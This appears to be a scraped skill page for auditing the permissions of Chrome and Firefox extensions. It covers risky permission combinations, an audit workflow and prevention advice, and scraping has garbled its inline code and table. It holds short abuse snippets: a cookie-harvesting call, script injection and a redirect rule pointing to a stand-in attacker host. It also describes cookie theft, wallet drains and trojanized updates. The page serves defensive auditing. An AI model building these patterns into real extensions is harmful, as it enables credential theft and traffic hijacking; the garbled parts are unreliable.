Hacktricks-skills browser-extension-permission-audit
Audit browser extension permissions and host_permissions for security vulnerabilities. Use this skill whenever analyzing Chrome/Firefox extensions, reviewing manifest.json files, investigating extension security, or pentesting browser extensions. Trigger on mentions of extension permissions, host_permissions, manifest analysis, extension security testing, or when examining potentially malicious browser extensions.
install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest:
skills/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions/SKILL.MDsource content
Browser Extension Permission Audit
A skill for analyzing browser extension permissions and identifying security vulnerabilities in Chrome/Firefox extensions.
When to Use This Skill
Use this skill when:
- Analyzing a browser extension's
filemanifest.json - Investigating potentially malicious extensions
- Pentesting browser extensions for security vulnerabilities
- Reviewing extension permissions for compliance
- Auditing extensions for excessive privilege requests
- Investigating extension-based attacks or data exfiltration
Quick Start
# Analyze a manifest.json file python scripts/analyze_manifest.py path/to/manifest.json # Check for dangerous permission combinations python scripts/check_risky_permissions.py path/to/manifest.json
Understanding Extension Permissions
permissions
vs host_permissions
permissionshost_permissions
- Controls access to privileged browser APIs:permissions
- Persistent key-value storage (can't be cleared without uninstalling)storage
- Access to all browser cookies (credential theft risk)cookies
- Tab management and monitoringtabs
- Full browsing history accesshistory
- Read all bookmarksbookmarks
- Monitor clipboard for passwordsclipboard
- Track user locationgeolocation
- Intercept and modify network requestswebRequest
- Execute arbitrary code in pagesscripting
- Block/redirect trafficdeclarativeNetRequest
- Controls which origins APIs can access:host_permissions
or"*://*/*"
- Access to ALL websites (extremely dangerous)"<all_urls>"
- Same as above"http://*/*", "https://*/*"- Specific patterns like
- Limited scope"https://example.com/*"
Critical Permission Combinations
| Combination | Risk | Impact |
|---|---|---|
| 🔴 Critical | Can steal auth cookies from any site |
| 🔴 Critical | Can inject code into any page |
| 🔴 Critical | Can intercept/modify all traffic |
| 🟠 High | Wallet drain pattern |
| 🟡 Medium | User profiling |
| 🟡 Medium | Privacy invasion |
Audit Workflow
Step 1: Extract and Parse Manifest
# If you have the extension package unzip extension.crx -d extension/ cat extension/manifest.json | python scripts/analyze_manifest.py -
Step 2: Identify Risky Permissions
Run the permission checker:
python scripts/check_risky_permissions.py manifest.json
This will flag:
- Overly broad
host_permissions - Dangerous API combinations
- MV3-specific risks (
)declarativeNetRequestWithHostAccess - Implicit privilege abuse patterns
Step 3: Analyze Runtime Behavior
Check for these abuse patterns:
Cookie Theft:
// Look for this pattern in background scripts chrome.cookies.getAll({}, function(cookies) { // Exfiltration attempt });
Dynamic Script Injection:
// Dangerous: arbitrary code execution chrome.tabs.executeScript(tabId, {code: maliciousCode}); chrome.scripting.executeScript({func: maliciousFunc});
Traffic Hijacking:
// MV3 rule injection chrome.declarativeNetRequest.updateDynamicRules({ addRules: [{ action: { type: "redirect", redirect: { url: "https://attacker.tld" } } }] });
Step 4: Check for Supply Chain Risks
- Verify extension signature and publisher
- Check update history for sudden permission changes
- Look for
(weaker install prompt)declarativeNetRequestWithHostAccess - Review Web Store API key usage patterns
Common Abuse Patterns
1. Supply-Chain Trojanized Updates
- Stolen developer accounts push MV3 updates
- Add
+<all_urls>
/declarativeNetRequestscripting - Inject remote JS to siphon headers/DOM content
2. Wallet Drains
- Host access +
+storagetabs - Backdoored wallet extensions exfiltrate seeds
- Stolen Web Store API keys ship malicious builds
3. Cookie Theft
+ broad host accesscookies- Reads auth cookies despite
HttpOnly - Treat as credential-stealing capable
4. Implicit Privilege Abuse
- Bypass popup blockers, create unlimited tabstabs.create()
- Modify existing tabs, load adstabs.update()
URIs in Chrome - Phishing attacksdata:- Webcam/microphone - One-time prompt, then always-on access
Prevention Recommendations
For Users
- Review permissions before installing extensions
- Use
permission when possible (user-initiated only)activeTab - Check extension permissions regularly in browser settings
- Remove unused extensions immediately
- Be wary of extensions requesting
<all_urls>
For Developers
- Request minimum necessary permissions
- Use
for user-initiated actionsactiveTab - Avoid
when possiblehost_permissions - Implement runtime permission requests for optional features
- Follow Google's policy: no excessive privileges
For Security Teams
- Monitor extension update patterns
- Check for sudden permission escalations
- Audit
rulesdeclarativeNetRequest - Review
for hidden issueschrome://extensions/?errors - Test with
for developer modechrome://extensions/?id=<id>
Reference Commands
# Chrome extension inspection chrome://extensions/?id=<extension-id> chrome://extensions/?errors # Firefox extension inspection about:debugging#/runtime/this-firefox # View extension permissions chrome://extensions/ (click extension → Details)
Scripts
analyze_manifest.py
analyze_manifest.pyAnalyzes manifest.json and reports permission risks.
check_risky_permissions.py
check_risky_permissions.pyChecks for dangerous permission combinations and abuse patterns.